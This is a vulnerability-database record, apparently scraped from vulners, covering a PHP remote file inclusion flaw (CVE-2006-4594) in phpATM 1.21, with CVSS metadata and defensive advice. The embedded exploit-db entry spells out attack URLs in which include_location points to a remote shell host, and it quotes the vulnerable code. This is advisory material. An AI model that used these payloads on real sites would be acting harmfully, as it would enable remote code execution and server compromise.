ID OSVDB:31976
Type osvdb
Reporter OSVDB
Modified 2006-08-30T18:41:52
Description
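No description provided by the source. Per this record's title and the linked CVE-2006-4594 entry, the issue is a PHP remote file inclusion in login.php of PHP Advanced Transfer Manager (phpATM) 1.21 and earlier: the include_location parameter is used to build an include path, so a URL supplied in it leads to arbitrary PHP code execution. The note attached to the exploit-db entry points to a loop in common.php that assigns array entries into $GLOBALS, which presumably is what lets request input overwrite that variable. For defenders: the include path should come only from server-side configuration, never from request data, and PHP's remote-include settings (allow_url_include, or allow_url_fopen on older PHP versions) should be disabled.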
References:
Vendor URL: http://phpatm.free.fr/
Related OSVDB ID: 31975
Related OSVDB ID: 31994
ISS X-Force ID: 28670
Generic Exploit URL: http://www.milw0rm.com/exploits/2279
CVE-2006-4594
Bugtraq ID: 19765
{"href": "https://vulners.com/osvdb/OSVDB:31976", "id": "OSVDB:31976", "reporter": "OSVDB", "published": "2006-08-30T18:41:52", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://phpatm.free.fr/\n[Related OSVDB ID: 31975](https://vulners.com/osvdb/OSVDB:31975)\n[Related OSVDB ID: 31994](https://vulners.com/osvdb/OSVDB:31994)\nISS X-Force ID: 28670\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2279\n[CVE-2006-4594](https://vulners.com/cve/CVE-2006-4594)\nBugtraq ID: 19765\n", "title": "PHP Advanced Transfer Manager (phpATM) login.php include_location Variable Remote File Inclusion", "lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-4594"], "affectedSoftware": [], "viewCount": 5, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4594"]}, {"type": "osvdb", "idList": ["OSVDB:31975"]}, {"type": "exploitdb", "idList": ["EDB-ID:2279"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 7.1}, "modified": "2006-08-30T18:41:52"}
{"cve": [{"lastseen": "2021-02-02T05:27:23", "description": "Multiple PHP remote file inclusion vulnerabilities in PHP Advanced Transfer Manager (phpAtm) 1.21 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the include_location parameter in (1) confirm.php or (2) login.php. NOTE: the include_location parameter to index.php is already covered by CVE-2005-1681.", "edition": 6, "cvss3": {}, "published": "2006-09-06T22:04:00", "title": "CVE-2006-4594", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4594"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:bugada_andrea:php_advanced_transfer_manager:1.20", "cpe:/a:bugada_andrea:php_advanced_transfer_manager:1.21"], "id": "CVE-2006-4594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4594", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:bugada_andrea:php_advanced_transfer_manager:1.20:*:*:*:*:*:*:*", "cpe:2.3:a:bugada_andrea:php_advanced_transfer_manager:1.21:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-4594"], "description": "# No description provided by the source\n\n## References:\nVendor URL: http://phpatm.free.fr/\n[Related OSVDB ID: 31976](https://vulners.com/osvdb/OSVDB:31976)\n[Related OSVDB ID: 31994](https://vulners.com/osvdb/OSVDB:31994)\nISS X-Force ID: 28670\nGeneric Exploit URL: 
http://www.milw0rm.com/exploits/2279\n[CVE-2006-4594](https://vulners.com/cve/CVE-2006-4594)\nBugtraq ID: 19765\n", "edition": 1, "modified": "2006-08-30T18:41:52", "published": "2006-08-30T18:41:52", "href": "https://vulners.com/osvdb/OSVDB:31975", "id": "OSVDB:31975", "title": "PHP Advanced Transfer Manager (phpATM) confirm.php include_location Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:54:53", "description": "phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities. CVE-2006-4594,CVE-2006-4749. Webapps exploit for php platform", "published": "2006-08-30T00:00:00", "type": "exploitdb", "title": "phpAtm <= 1.21 include_location Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4594", "CVE-2006-4749"], "modified": "2006-08-30T00:00:00", "id": "EDB-ID:2279", "href": "https://www.exploit-db.com/exploits/2279/", "sourceData": "########################################################################\n# phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit\n# \n# Level : Dangerous \n# Download : http://phpatm.free.fr/\n# Version : v1.21 \n# \n# Found By: KinSize [MHG Security Team]\n#\n########################################################################\n# Code : include($include_location.'include/conf.php');\n#\n# exploit:\n# http://www.sitename.com/[script_path]/confirm.php?include_location=http://shellurl.com ? \n# http://www.sitename.com/[script_path]/index.php?include_location=http://shellurl.com ? 
\n# http://www.sitename.com/[script_path]/login.php?include_location=http://shellurl.com ?\n########################################################################\n#\n#Conatact : nefretaskimdir[at]gmail.com\n#\n# GreetZ : Damage-N | by_emr3 | by_OkSit | ESKOBAR | Ye.iL | PowerCobra | sys-worm(Turkish)| Z e b e r u S | ALL Turkish & MusLim\n########################################################################\n\nAdded information:\n\nAt first glance this doesn't look vulnerable but then again:\n\nline 85-94 of common.php\nwhile (list(, $arr) = each($sysarr))\n{\n if (is_array($arr))\n {\n while (list($key, $value) = each($arr))\n {\n $GLOBALS[$key] = $value;\n }\n }\n}\n\n/str0ke\n\n# milw0rm.com [2006-08-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2279/"}]}